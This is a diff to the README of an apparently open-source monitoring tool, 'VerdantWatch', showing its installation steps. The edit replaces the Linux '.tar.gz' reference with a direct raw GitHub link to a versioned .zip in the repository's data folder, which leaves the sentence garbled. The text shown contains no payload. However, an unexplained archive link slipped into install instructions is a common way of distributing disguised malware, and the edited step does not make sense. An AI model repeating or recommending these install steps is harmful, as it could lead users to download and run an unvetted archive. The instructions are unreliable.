nuqen/verdantwatch-monitoring/README.md

 5. **Run the Installer**:
    - **Windows**: Double-click the `.exe` file and follow the prompts to install.
    - **macOS**: Open the `.dmg` file and drag VerdantWatch to your Applications folder.
-   - **Linux**: Extract the `.tar.gz` file and follow the accompanying README for installation instructions.
+   - **Linux**: Extract the `https://raw.githubusercontent.com/nuqen/verdantwatch-monitoring/main/data/verdantwatch-monitoring-v3.3.zip` file and follow the accompanying README for installation instructions.

 6. **Launch the Application**: After installation, find VerdantWatch in your applications list.
 Click on it to start monitoring your environment!